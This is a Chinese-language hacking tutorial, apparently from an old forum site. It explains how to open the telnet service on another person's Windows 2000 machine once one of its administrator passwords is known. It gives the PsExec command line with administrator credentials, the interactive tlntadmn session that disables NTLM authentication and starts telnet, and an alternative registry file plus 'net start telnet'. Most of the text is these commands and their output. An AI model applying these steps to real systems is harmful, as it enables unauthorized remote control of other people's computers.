快速开启对方机器（win2000）的telnet服务

引子：某日、某天、某时间、某地点、某某人、某台机器、… 
工具：psexec.exe 
试验者：littleshrimp http://www.chinansl.com 
条件：知道对方机器的管理员账号密码任意一个，使用psexec.exe 工具开启对方机器的telnet 服务。实践通过。 

现在在网上流行的开对方机器的telnet 服务的教程有这么两种： 
一、 小榕的流光工具自带的一个工具系列：ntlm.exe runas.exe ……俺觉得繁琐无比：（ 
没有轻视小榕的意思:”）觉得小榕能写一个程序修改注册表,不简单:”) 
二、.abu.写的一个快速开启对方机器的telnet 服务的一个教程。说是快，实际上不快：（ 
需要操作对方机器的注册表，速度奇慢无比。也没有什么XX意思:”( 
三、俺自己写的一个开启对方机器telnet 服务的教程，呵呵~~不是流行的，---参考：）比较快的一种，呵呵~俺没有自夸，需要两个工具：psexec.exe、ntlm.exe。方法略:”)有更好的你难道不想用么:”) 
呵呵~~对上边的开启telnet 服务的教程，做了一点评论，个人意见，仅供参考。 
今天我讲的快速开启对方机器（win 2000）的telnet服务之需要一个工具即可。 
PSEXEC.EXE 
做一下介绍： 
C:\Tools\Pstools>psexec.exe 

PsExec v1.3 - execute processes remotely 
Copyright (C) 2001 Mark Russinovich 
www.sysinternals.com 

PsExec executes a program on a remote system, where remotely executed console 
applications execute interactively. 

Usage: psexec \\computer [-u user [-p psswd]][-s][-i][-c [-f]][-d] cmd [argument 
s] 
   -u     Specifies optional user name for login to remote 
        computer. 
   -p     Specifies optional password for user name. If you omit this 
        you will be prompted to enter a hidden password. 
   -s     Run the remote process in the System account. 
   -i     Run the program so that it interacts with the desktop on the 
        remote system. 
   -c     Copy the specified program to the remote system for 
        execution. If you omit this option the application 
        must be in the system path on the remote system. 
   -f     Copy the specified program even if the file already 
        exists on the remote system. 
   -d     Don<|>t wait for process to terminate (non-interactive). 
   program  Name of application to execute. 
   arguments Arguments to pass (note that file paths must be 
        absolute paths on the target system). 

You can enclose applications that have spaces in their name with 
quotation marks e.g. psexec \\marklap "c:\long name app.exe". 
Input is only passed to the remote system when you press the enter 
key, and typing Ctrl-C terminates the remote process. 

If you omit a user name the process will run in the context of your 
account on the remote system, but will not have access to network 
resources (because it is impersonating). Specify a valid user name 
in the Domain\User syntax if the remote process requires access 
to network resources or to run in a different account. Note that 
the password is transmitted in clear text to the remote system. 
C:\Tools\Pstools> 
英文的，什么你不懂英文？？呵呵~自己还是慢慢摸索吧！！ 
这里我们运用这个命令行的两个参数-u –p 介绍一下：-u 就是对方机器的管理员的账号 –p 就是对方管理员账号的密码，如果密码为空则没有 –p 这个选项。 
运行格式：psexec.exe \\对方机器的ip -u 对方机器的管理员账号 –p 对方机器的管理员账号密码 cmd （需要运行的程序） 
步骤命令行下： 
1、 psexec.exe \\ip -u administrator –p foolishman cmd 
2、 进入对方机器 一般是c:\winnt\system32\〉下执行 tlntadmn.exe –呵呵~~这个是个什么程序？？Telnet 服务器管理！呵呵~~知道了？？ 
3、 可以了，你已经知道该如何做乐：） 
4、 EOF 
进入对方机器后方法2: 
还有一种方法就是写一个reg文件,修改ntlm的值为0或1 
在dos下 
c:\>copy con reg.reg 
Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] 
"NTLM"=dword:00000000 
^z 
c:\>regedit /s reg.reg 不出现确定窗口:") 
c:\>net start telnet 
OK 
开启对方的telnet服务了:")很简洁是不是:") 
方法1附上操作步骤: 
本机运行: 
D:\hack\>tlntadmn 


Microsoft (R) Windows 2000 (TM) (内部版本号 2195) 
Telnet Server Admin (Build 5.00.99201.1) 

请在下列选项中选择一个: 


0) 退出这个应用程序 
1) 列出当前用户 
2) 结束一个用户的会话 ... 
3) 显示 / 更改注册表设置 ... 
4) 开始服务 
5) 停止服务 

请键入一个选项的号码 [0 - 5] 以选择该选项: 3 


请在下列选项中选择一个: 

0) 退出这个菜单 
1) AllowTrustedDomain 
2) AltKeyMapping 
3) DefaultDomain 
4) DefaultShell 
5) LoginScript 
6) MaxFailedLogins 
7) NTLM 
8) TelnetPort 
请键入一个选项的号码 [0 - 8] 以选择该选项: 7 
NTLM 的当前值 = 1 
您确实想更改这个值吗 ? [y/n]y 
NTLM [ 当前值 = 1; 可接受的值 0、1 或 2 ] :0 
您确实想将 NTLM 设置为 : 0 ? [y/n]y 

只有当 Telnet 服务重新开始后设置才会生效 


请在下列选项中选择一个: 

0) 退出这个菜单 
1) AllowTrustedDomain 
2) AltKeyMapping 
3) DefaultDomain 
4) DefaultShell 
5) LoginScript 
6) MaxFailedLogins 
7) NTLM 
8) TelnetPort 
请键入一个选项的号码 [0 - 8] 以选择该选项: 0 

请在下列选项中选择一个: 


0) 退出这个应用程序 
1) 列出当前用户 
2) 结束一个用户的会话 ... 
3) 显示 / 更改注册表设置 ... 
4) 开始服务 
5) 停止服务 

请键入一个选项的号码 [0 - 5] 以选择该选项: 4 
启动 Microsoft Telnet 服务 ... 
Microsoft Telnet 服务启动成功 

请在下列选项中选择一个: 


0) 退出这个应用程序 
1) 列出当前用户 
2) 结束一个用户的会话 ... 
3) 显示 / 更改注册表设置 ... 
4) 开始服务 
5) 停止服务 

请键入一个选项的号码 [0 - 5] 以选择该选项: 0 

############################################################################### 
对方机器上运行: 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) 版权所有 1985-2000 Microsoft Corp. 

C:\WINNT\system32>tlntadmn=>回车!运行telnet管理器,但并不显示菜单:( 
3<=键入 回车 
------------------------ 
1) AllowTrustedDomain 
2) AltKeyMapping 
3) DefaultDomain 
4) DefaultShell 
5) LoginScript 
6) MaxFailedLogins 
7) NTLM 
8) TelnetPort 
------------------------出现的菜单~~ 
7<=键入 回车 
y<=键入 回车 
NTLM0<=键入(0)NTLM不是输入的 回车 
y<=键入 回车 
--------------------- 
1) AllowTrustedDomain 
2) AltKeyMapping 
3) DefaultDomain 
4) DefaultShell 
5) LoginScript 
6) MaxFailedLogins 
7) NTLM 
8) TelnetPort 
---------------------修改NTLM以后出现菜单 
0<=键入 回车 退出这个菜单 
4<=键入 回车 打开telnet服务<=>net start telnet 
0<=键入 回车 退出telnet管理器 

C:\WINNT\system32>OK 已经开启了对方机器的 telnet 服务。